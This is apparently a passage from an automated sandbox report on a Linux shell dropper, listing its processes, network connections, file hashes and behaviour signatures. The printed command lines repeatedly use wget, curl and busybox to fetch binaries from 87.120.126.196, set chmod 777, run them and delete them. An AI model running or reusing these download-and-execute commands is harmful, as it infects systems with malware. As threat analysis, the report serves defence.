[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/chmod

[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF

[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/rm

[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/wget

[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/chmod

[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/rm

[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/wget

[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/chmod

[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK

[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/rm

[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/wget

[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/chmod

[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4

[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/rm

[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/wget

[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/chmod

[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir

[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/rm

[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/wget

[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/chmod

[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C

[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/rm

[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/wget

[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/chmod

[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7

[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/rm

[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/wget

[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/chmod

[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8

[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/rm

[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/wget

[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/chmod

[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F

[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/rm

[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/wget

[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/chmod

[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp

[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/rm

[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/wget

[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/chmod

[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2

[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/rm

[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/wget

[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/chmod

[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3

[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/rm

[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 01:06

Reported

2024-10-28 01:09

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

130s

Command Line

[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP N/A
N/A /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK N/A
N/A /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 N/A
N/A /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F N/A
N/A /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp N/A
N/A /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 N/A
N/A /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 N/A
N/A /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir N/A
N/A /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C N/A
N/A /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 N/A
N/A /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 N/A
N/A /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD N/A
N/A /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d N/A
N/A /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF N/A
N/A /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD N/A
N/A /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d N/A
N/A /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF N/A
N/A /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP N/A
N/A /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK N/A
N/A /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 N/A
N/A /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir N/A
N/A /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C N/A
N/A /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 N/A
N/A /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 N/A
N/A /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F N/A
N/A /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp N/A
N/A /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 N/A
N/A /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /usr/bin/curl N/A
File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /usr/bin/curl N/A
File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /usr/bin/curl N/A
File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /usr/bin/curl N/A
File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /usr/bin/curl N/A
File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /usr/bin/curl N/A
File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /usr/bin/curl N/A
File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /usr/bin/curl N/A
File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /usr/bin/curl N/A
File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /usr/bin/curl N/A
File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /usr/bin/curl N/A
File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /usr/bin/curl N/A
File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /usr/bin/curl N/A
File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /usr/bin/curl N/A
File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /usr/bin/curl N/A
File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /usr/bin/curl N/A
File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /usr/bin/curl N/A
File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /usr/bin/curl N/A
File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /usr/bin/curl N/A
File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /usr/bin/curl N/A
File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /usr/bin/curl N/A
File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /usr/bin/curl N/A
File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /usr/bin/curl N/A
File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /usr/bin/curl N/A
File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /usr/bin/curl N/A
File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /usr/bin/curl N/A
File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /usr/bin/curl N/A
File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /usr/bin/curl N/A

Processes

/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh

[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/chmod

[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/rm

[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/wget

[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/chmod

[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK

[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/rm

[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/wget

[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/chmod

[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4

[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/rm

[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/wget

[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/chmod

[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F

[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/rm

[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/wget

[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/chmod

[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp

[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/rm

[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/wget

[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/chmod

[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2

[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/rm

[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/wget

[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/chmod

[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3

[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/rm

[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/wget

[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/chmod

[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir

[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/rm

[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/wget

[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/chmod

[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C

[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/rm

[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/wget

[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/chmod

[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7

[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/rm

[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/wget

[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/curl

